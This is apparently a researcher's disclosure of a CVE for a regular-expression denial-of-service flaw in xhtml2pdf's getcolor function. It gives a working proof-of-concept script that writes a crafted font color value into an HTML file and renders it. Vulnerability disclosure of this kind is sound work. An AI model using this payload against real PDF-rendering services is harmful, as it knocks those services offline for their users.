This is my first CVE published by myself. A lot of times people write unsafe regular expressions that can lead to Denial Of Service and this is an example.

Description

A flaw was found in xhtml2pdf’s getcolor function in utils.py. This flaw allows an attacker to trigger a Regular expression Denial of Service (ReDOS) via specially crafted input.

PoC

• Install xhtml2pdf with pip install xhtml2pdf

• Run the following script

expl = 'rgb(00' + '0' * 3456

with open("PoC.html", "w") as f:
    f.write(f"""<para><font color="{expl}">
                exploit
</font></para>""")

• Execute xhtml2pdf PoC.html